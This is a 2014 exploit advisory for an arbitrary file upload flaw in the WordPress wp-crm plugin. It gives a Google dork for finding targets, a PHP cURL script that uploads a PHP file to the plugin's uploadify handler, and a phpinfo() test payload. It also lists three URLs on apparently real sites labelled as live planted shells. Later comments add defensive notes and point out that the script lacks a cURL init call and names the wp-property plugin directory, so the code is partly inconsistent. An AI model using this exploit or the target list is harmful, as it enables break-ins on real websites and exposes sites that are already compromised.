#############################################################################################
#
# Title : WordPress wp-crm Plugin Arbitrary File Upload Vulnerability #
#
# Author : X-Bruno #
#
#
# Date : 27/06/2014 #
#
# Facebook : http://www.facebook.com/Inj3ct.Bruno #
#
#
# Email: brunox338@gmail.com #
#
#
# Vendor : www.wordpress.org #
#
#
# Google Dork : inurl:/wp-content/plugins/wp-crm/ #
#
#
# Tested on : Linux #
#
#############################################################################################
Exploit : upload shell/.php
<?php
// Proof-of-concept from the advisory: a multipart POST aimed at the uploadify
// handler bundled with the plugin. As printed, the listing is a fragment rather
// than a runnable script: $ch is used throughout but no curl_init() call appears
// here, so the cURL handle and the request URL are never set in this view.
//
// Defender notes, grounded in the two form fields below: the request carries a
// 'Filedata' part holding the file body and a 'folder' part naming the directory
// the handler should write into. Denying PHP execution under
// wp-content/plugins/*/third-party/uploadify/ at the web-server level, and
// alerting on POST requests to that path that carry a 'folder' field or on new
// .php files appearing beneath it, both address the risk described on this page.
$uploadfile = "Bruno.php";  // local file to send; the advisory's example name
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array(
    // '@' prefix is cURL's legacy "send this path as a file upload" marker
    'Filedata' => "@$uploadfile",
    // NOTE: this value names wp-property, while the advisory title and the
    // access path further down name wp-crm; the page itself does not reconcile
    // the two, so treat the directory as plugin-specific and verify per install.
    'folder' => "/wordpress/wp-content/plugins/wp-property/third-party/uploadify/"
));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);  // return the body instead of printing it
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";  // echo whatever the upload handler answered
?>
-------------------------------
<?php
// Contents of the file the advisory uploads: phpinfo() dumps the host's PHP
// configuration, presumably used here to confirm that files written into the
// uploadify directory are executed by the server rather than served as text.
phpinfo();
?>
-------------------------------
Shell Access ==== > http://localhost/wordpress/wp-content/plugins/wp-crm/third-party/uploadify/(shell_name.php)
--------------------------------
Examples : (Live Shells)
1- http:
//www.transport9.com/wp-content/plugins/wp-crm/third-party/uploadify/fuck.php
2- http:
//adbuzzler.com/wp-content/plugins/wp-crm/third-party/uploadify/fuck.php
3- http:
//ourladyofthecape.com/wp-content/plugins/wp-crm/third-party/uploadify/fuck.php
#####################################################################
# Greeting : Toomy Jone , Injector Hacker , Dr.SHA6H , HunTerS - Team #
#####################################################################